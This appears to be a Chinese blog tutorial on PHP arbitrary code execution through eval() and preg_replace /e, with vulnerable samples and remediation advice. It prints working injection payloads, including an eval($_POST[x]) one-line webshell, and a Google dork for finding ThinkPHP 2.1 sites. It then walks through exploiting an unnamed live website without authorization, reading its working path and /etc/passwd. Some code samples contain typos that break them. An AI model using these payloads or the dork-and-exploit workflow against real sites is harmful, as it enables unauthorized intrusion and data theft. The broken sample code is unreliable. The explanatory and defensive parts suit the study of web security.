任意代码执行漏洞

0x00 什么是任意代码执行

  • 当应用在调用一些能将字符串转化成代码的函数(如PHP重的eval)时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞。狭义的代码注入通常指将可执行代码注入到当前页面中,如PHP的eval函数,可以将字符串代表的代码作为PHP代码执行,当用户能够控制这段字符串时,将产生代码注入漏洞(也称命令执行)。广义上的代码注入,可以覆盖大半安全漏洞的分类。

0x01 为什么存在任意代码执行

  • 几种常用函数语言,都有将字符串转化成代码去执行的相关函数。
  • PHP ===> eval( ),assert( )
  • Python ===> exec( )
  • Asp ===> <%=CreateObject("wscript.shell").exec("cmd.exe /c ipconfig").StdOut.ReadAll()%>

0x02 为什么使用执行代码函数

  • 应用有时候会考虑灵活性、简洁性,在代码中调用eval之类的函数去处理。
1
2
3
4
5
6
7
8
9
10
11
12
13
function string2array(%data){
    if($data == '')
        return array();
    @eavl("\$array = $data");
    return $array;
}
//当 $data 接受的字符串是这样时:
$data = "array(
    'upload_maxsize' => '2048',
    'upload_allowext' => 'jpg|jpge|gif|bmp|png|doc|docx|xls|xlsx|ppt|pptx|pdf|txt|rar|zip|swf',
    'watermark_enable' ==> '1',
    )"
//通过eval()函数就可以将字符串‘array(....)’作为数组赋值给$array,这样会大大的提升代码的灵活性和简洁性。

0x03 漏洞分类

  • eval()、assert()  (不常见)
  • preg_replace + /e 模式

0x04 漏洞利用(本地测试)

  • eval() ==>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#1:
<?php
$data $_GET['data'];
eval("\$ret = $data;");
echo $ret;
/*
    payload:
        ?data=phpinfo()
        ?data=1;phpinfo()
        ?data=${phpinfo()}
        ?data=${@eval($_POST[x])}  #一句话木马,可以用菜刀连接
*/
 ?>
 
#2:
<?php
$data $_GET['data'];
echo "\$ret= '$data'";
eval("\$ret = strtolower('$data');");
echo $ret;
/*
    payload:
        ?data=');phpinfo();//
        ?data=');@eval($_POST[a]);//
*/
 ?>
 
#3:
<?php
$data $_GET['data'];
eval("\$ret = strtolower(\"$data\");");
echo $ret;
/*
    payload
        ?data={${phpinfo()}}
        ?data=1");phpinfo();//
        ?data=${@eval($_POST[x])}
*/
 ?>
  • preg_replace() ==>
1
2
3
4
5
6
7
8
9
10
11
<?php
$data $_GET['data'];
echo $data;
preg_replace('/<data>(.*)<\/data>/e''$ret = "\\1";',$data);
echo $ret;
/*
    payload:
        ?data=<data>${phpinfo()}</data>
    注:PHP 5.5.0 /e 修饰符已经被弃用
*/
 ?>

0x05 修复方案

  • eval() ==>
  • 能使用json保存数组、对象就是用json,不要将PHP对象保存成字符串,否则读取的时候就需要使用eval
  • 对于必须使用eval的情况,一定要保证用户不能轻易接触eval的参数(或用正则严格判断输入的数据格式)。
  • 对于字符串,一定要使用单引号包裹可控代码,并在插入前进行addslashes
  • $data = addslashes($data)
  • eval("\$data = eval('$data');")
  • preg_replace() ==>
  • 放弃使用preg_replace的/e修饰符
  • 使用preg_replace_callback()替换
  • 如果必须使用preg_replace()+e修饰符,请保证第二个参数中,对于正则匹配出的对象,用单引号包裹

0x06 实例测试

  • 前面说了一大堆理论,现在来找个实例实际测试下。(本来想把网址公开的想想还是算了,这个漏洞的破坏性还是挺大的,就不公开了,我也怕“从web安全到派出所”......)
  • 尽管不会公开网址,但是还会告诉大家怎么去找这种存在 任意代码执行 的网站
  • ok,下面开始一步一步去实现漏洞的利用
  • 任意代码执行漏洞的存在环境:thinkphp 版本:2.1
  • google hacking 也就是谷歌搜索啊:
1
intext:thinkphp intext:"Fast & Simple OOP PHP Framework"intext:"2.1"
1
2
为什么thinkphp这个版本存在 任意代码执行 漏洞,出现漏洞的代码是什么我在这就不提了,大家
有兴趣的可自行百度。
  • 测试目标url:按照上面说的我们先来测试看看时候存在任意代码执行

wKiom1eWDeXTuOMGAAJUPDicuVY248.png-wh_50

  • biubiubiu.....存在代码执行漏洞
  • 直接上一句话吧.....
  • id/{${@eval($_POST[x])}}.html

wKiom1eWEvrj8XrqAAOME-fwxAM267.png-wh_50

  • 返回当前路径:id/{${exit(print(getcwd()))}}.html
1
2
3
解释下这句:getcwd() 返回当前工作路径
            print()  打印一下
            exit()   停止加载,网站停止渲染只会显示当前工作路径
  • 读取文件:
  • id/{${exit(var_dump(file_get_contents($_POST[f])))}}.html
  • f=/etc/passwd

wKiom1eWFJzB1HrYAARxFdT0x8s274.png-wh_50

  • ok,现在利用完毕
  • 本文有什么不对的地方,欢迎大家指正
  • 欢迎大家交流学习
  • 希望大家只用来做测试,不要搞破坏。
  • 本文出自 “启思·朝圣者” 博客